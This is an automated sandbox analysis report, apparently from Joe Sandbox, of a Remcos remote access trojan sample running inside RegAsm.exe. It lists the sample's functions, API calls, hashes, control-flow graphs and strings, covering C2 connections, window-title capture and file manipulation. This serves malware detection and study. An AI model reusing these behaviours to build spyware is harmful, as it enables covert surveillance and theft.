                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID:
                                                  • API String ID: 4229901323-0
                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                  Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 98 40ec27-40ec3d call 401fab call 4139e4 80->98 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 98->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 128 40ecc6 call 407790 107->128 129 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 128->129 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 129->177 178 40edbb-40edbf 129->178 141->107 144 40eca4-40ecaa 141->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 192 40ee59-40ee7d call 40247c call 434829 184->192 185->192 212 40ee8c 192->212 213 40ee7f-40ee8a call 436f10 192->213 205->178 215 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->215 213->215 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 215->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 290 40f01b-40f01d 287->290 291 40f01f 287->291 289 40effe-40f015 call 41ce2c CreateThread 288->289 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                  • API String ID: 2830904901-3701325316
                                                  • Opcode ID: 75c18c0ccd933b3bae2a3c6af3dc2293cb1f3bb301aba7dba6372688cc0833ab
                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                  • Opcode Fuzzy Hash: 75c18c0ccd933b3bae2a3c6af3dc2293cb1f3bb301aba7dba6372688cc0833ab
                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                  Function 00414F65 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 566 415220-415246 call 402093 * 2 call 41b580 560->566 567 41524b-415259 call 404f51 call 4048c8 560->567 582 415ade-415af0 call 404e26 call 4021fa 561->582 566->582 580 41525e-415260 567->580 581 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 580->581 580->582 648 4153bb-4153c8 call 405aa6 581->648 649 4153cd-4153f4 call 401fab call 4135e1 581->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 582->597 598 415b18-415b20 call 401e8d 582->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a51 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 902 415a53-415a5a 656->902 903 415a65-415a6c 656->903 902->903 906 415a5c-415a5e 902->906 904 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->904 905 415a6e-415a73 call 40b08c 903->905 917 415aac-415ab8 CreateThread 904->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 904->918 905->904 906->903 917->918 918->582
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.1.3 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                  • API String ID: 524882891-3785195355
                                                  • Opcode ID: 36ae4ca0ddcce510b1f6f4c43d9f3cdffd11b7a3780b4b315adef822fefe3200
                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                  • Opcode Fuzzy Hash: 36ae4ca0ddcce510b1f6f4c43d9f3cdffd11b7a3780b4b315adef822fefe3200
                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                  Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                  • API String ID: 3795512280-1152054767
                                                  • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                  • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                  Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1028 404a21-404a2f WSAGetLastError 1024->1028 1029 404a97 1024->1029 1026 404a17-404a19 1025->1026 1027 4048f7-4048fa 1025->1027 1030 404a99-404a9e 1026->1030 1031 404926-404930 call 420cf1 1027->1031 1032 4048fc-404923 call 40531e call 402093 call 41b580 1027->1032 1028->1029 1033 404a31-404a34 1028->1033 1029->1030 1045 404941-40494e call 420f20 1031->1045 1046 404932-40493c 1031->1046 1032->1031 1035 404a71-404a76 1033->1035 1036 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1033->1036 1038 404a7b-404a94 call 402093 * 2 call 41b580 1035->1038 1036->1029 1038->1029 1055 404950-404973 call 402093 * 2 call 41b580 1045->1055 1056 404987-404992 call 421ad1 1045->1056 1046->1038 1085 404976-404982 call 420d31 1055->1085 1068 4049c4-4049d1 call 420e97 1056->1068 1069 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1056->1069 1082 4049d3-4049f6 call 402093 * 2 call 41b580 1068->1082 1083 4049f9-404a14 CreateEventW * 2 1068->1083 1069->1085 1082->1083 1083->1026 1085->1029
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                  • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                  Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                  Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                  • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                  Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1195 40da6f-40da94 call 401f86 1198 40da9a 1195->1198 1199 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1195->1199 1200 40dae0-40dae7 call 41c048 1198->1200 1201 40daa1-40daa6 1198->1201 1202 40db93-40db98 1198->1202 1203 40dad6-40dadb 1198->1203 1204 40dba9 1198->1204 1205 40db9a-40db9f call 43c11f 1198->1205 1206 40daab-40dab9 call 41b645 call 401f13 1198->1206 1207 40dacc-40dad1 1198->1207 1208 40db8c-40db91 1198->1208 1225 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1199->1225 1220 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1200->1220 1221 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1200->1221 1210 40dbae-40dbb3 call 43c11f 1201->1210 1202->1210 1203->1210 1204->1210 1216 40dba4-40dba7 1205->1216 1228 40dabe 1206->1228 1207->1210 1208->1210 1222 40dbb4-40dbb9 call 409092 1210->1222 1216->1204 1216->1222 1234 40dac2-40dac7 call 401f09 1220->1234 1221->1228 1222->1199 1228->1234 1234->1199
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                  Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1294 41c482-41c493 1295 41c495-41c498 1294->1295 1296 41c4ab-41c4b2 1294->1296 1298 41c4a1-41c4a9 1295->1298 1299 41c49a-41c49f 1295->1299 1297 41c4b3-41c4cc CreateFileW 1296->1297 1300 41c4d2-41c4d7 1297->1300 1301 41c4ce-41c4d0 1297->1301 1298->1297 1299->1297 1303 41c4f2-41c503 WriteFile 1300->1303 1304 41c4d9-41c4e7 SetFilePointer 1300->1304 1302 41c510-41c515 1301->1302 1306 41c505 1303->1306 1307 41c507-41c50e CloseHandle 1303->1307 1304->1303 1305 41c4e9-41c4f0 CloseHandle 1304->1305 1305->1301 1306->1307 1307->1302
                                                  APIs
